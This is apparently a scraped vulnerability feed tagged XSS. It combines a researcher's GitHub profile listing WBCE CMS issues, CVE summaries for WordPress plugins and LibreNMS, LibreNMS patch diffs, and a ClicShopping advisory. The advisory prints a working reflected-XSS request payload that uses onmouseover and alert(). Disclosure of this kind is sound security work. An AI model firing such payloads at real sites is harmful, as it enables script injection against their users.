A cross-site scripting (XSS) vulnerability in the Overview Page settings module of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Post Loop field.

*   2022
*   2021
*   2020

**Contribution activity**

**November 2022**

Created 8 commits in 3 repositories

*   gozan10/baiTapCongNgheWeb 3 commits
    
*   gozan10/rac 3 commits
    
*   gozan10/cve 2 commits
    

Created 3 repositories

*   gozan10/rac HTML Nov 8
*   gozan10/cve Nov 3
*   gozan10/baiTapCongNgheWeb HTML Nov 3

**Opened their first issue on GitHub in gozan10/baiTapCongNgheWeb Public**

Nov 3

**First issue**

cve

**Created an issue in WBCE/WBCE\_CMS that received 1 comment**

Nov 4

**XSS via No Results in Search Settings**

Hi team, i find small XSS in No Results field Step: First choose Settings and find Search Settings field then choose button Show Advanced Options I…

1 comment

Opened 7 other issues in 2 repositories

gozan10/cve 5 open

*   CVE WBCE\_4 Nov 4
*   CVE\_WBCE\_3 Nov 4
*   CVE\_WBCE\_2 Nov 4
*   CVE\_WBCE\_1 Nov 4
*   CVE\_WBCE Nov 3

WBCE/WBCE\_CMS 2 open

*   XSS via modul post loop in Pages Nov 5
*   Bypass account protection Nov 5

Seeing something unexpected? Take a look at the GitHub profile guide.

CVE-2022-45017: gozan10 - Overview

A cross-site scripting (XSS) vulnerability in the Modify Page module of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Source field.

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

CVE-2022-45012: GitHub - gozan10/cve

ClicShopping version 3.402 suffers from a cross site scripting vulnerability.

    ## Title: ClicShopping_V3-Version3.402 XSS-Reflected## Author: nu11secur1ty## Date: 11.20.2022## Vendor: https://www.clicshopping.org/forum/## Software: https://github.com/ClicShopping/ClicShopping_V3/releases/tag/version3_402## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3## Description:The name of an arbitrarily supplied URL parameter is copied into thevalue of an HTML tag attribute which is encapsulated in doublequotation marks.The attacker can trick users to open a very dangerous link or he canget sensitive information, also he can destroy some components of yoursystem.## STATUS: HIGH Vulnerability[+] Payload:```jsGET /ClicShopping_V3-version3_402/index.php?Search&AdvancedSearch&bel9c%22onmouseover%3d%22alert(`Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole`)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22zgm9j=1HTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3)## Proof and Exploit:[href](https://streamable.com/mgbftx)## Time spent`1:00`

ClicShopping 3.402 Cross Site Scripting

The Betheme theme for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 26.5.1.4 via deserialization of untrusted input supplied via the import, mfn-items-import-page, and mfn-items-import parameters passed through the mfn_builder_import, mfn_builder_import_page, importdata, importsinglepage, and importfromclipboard functions. This makes it possible for authenticated attackers, with contributor level permissions and above to inject a PHP Object. The additional presence of a POP chain would make it possible for attackers to execute code, retrieve sensitive data, delete files, etc..

CVE-2022-3861: Vulnerability Advisories Continued - Wordfence

The Evaluate WordPress plugin through 1.0 does not sanitize and escapes some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example, in multisite setup).

CVE-2022-3753

The Popup Maker WordPress plugin before 1.16.11 does not sanitise and escape some of its Popup options, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

CVE-2022-3690

The Spacer WordPress plugin before 3.0.7 does not sanitize and escapes some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example, in multisite setup).

CVE-2022-3618

The Five Star Restaurant Reservations WordPress plugin before 2.4.12 does not have authorisation when changing whether a payment was successful or failed, allowing unauthenticated users to change the payment status of arbitrary bookings. Furthermore, due to the lack of sanitisation and escaping, attackers could perform Cross-Site Scripting attacks against a logged in admin viewing the failed payments

CVE-2022-0421

A user is able to enable their own account if it was disabled by an admin while the user still holds a valid session. Moreover, the username is not properly sanitized in the admin user overview. This enables an XSS attack that enables an attacker with a low privilege user to execute arbitrary JavaScript in the context of an admin's account.

@@ -37,11 +37,24 @@ public function authorize()

\*/

public function rules()

{

if ($this\->user()->isAdmin()) {

return \[

'realname' => 'nullable|max:64|alpha\_space',

'email' => 'nullable|email|max:64',

'descr' => 'nullable|max:30|alpha\_space',

'new\_password' => 'nullable|confirmed|min:' . Config::get('password.min\_length', 8),

'new\_password\_confirmation' => 'nullable|same:new\_password',

'dashboard' => 'int',

'level' => 'int',

'enabled' => 'nullable',

'can\_modify\_passwd' => 'nullable',

\];

}

  

return \[

'realname' => 'nullable|max:64|alpha\_space',

'email' => 'nullable|email|max:64',

'descr' => 'nullable|max:30|alpha\_space',

'level' => 'int',

'old\_password' => 'nullable|string',

'new\_password' => 'nullable|confirmed|min:' . Config::get('password.min\_length', 8),

'new\_password\_confirmation' => 'nullable|same:new\_password',

CVE-2022-4068: Fix authentication mass assignment vulnerability (#14468) · librenms/librenms@09a2977

Cross-site Scripting (XSS) - Stored in GitHub repository librenms/librenms prior to 22.10.0.

@@ -84,7 +84,7 @@  
$class = $notif\['severity'\] == 2 ? 'text-danger' : 'text-warning'; echo "<h4 class='$class' id='${notif\['notifications\_id'\]}'>"; echo "<strong><i class='fa fa-bell-o'></i>&nbsp;${notif\['title'\]}</strong>"; echo "<strong><i class='fa fa-bell-o'></i>&nbsp;" . htmlentities($notif\['title'\]) . '</strong>'; echo "<span class='pull-right'>";  
if ($notif\['user\_id'\] != Auth::id()) { @@ -125,7 +125,7 @@ } elseif ($notif\['severity'\] == 2) { $class = 'text-danger'; } echo "<h4 class='$class' id='${notif\['notifications\_id'\]}'>${notif\['title'\]}<span class='pull-right'>"; echo "<h4 class='$class' id='${notif\['notifications\_id'\]}'>" . htmlentities($notif\['title'\]) . "<span class='pull-right'>";  
if (Auth::user()->hasGlobalAdmin()) { echo '<button class="btn btn-primary fa fa-bell-o stick-notif" data-toggle="tooltip" data-placement="bottom" title="Mark as Sticky" style="margin-top:-10px;"></button>'; @@ -168,7 +168,7 @@ } elseif ($notif\['severity'\] == 2) { echo ' class="text-danger"'; } echo " id='${notif\['notifications\_id'\]}'>${notif\['title'\]}"; echo " id='${notif\['notifications\_id'\]}'>" . htmlentities($notif\['title'\]);  
if (Auth::user()->isAdmin()) { echo '<span class="pull-right"><button class="btn btn-primary fa fa-bell-o stick-notif" data-toggle="tooltip" data-placement="bottom" title="Mark as Sticky" style="margin-top:-10px;"></button></span>';

Tag

#xss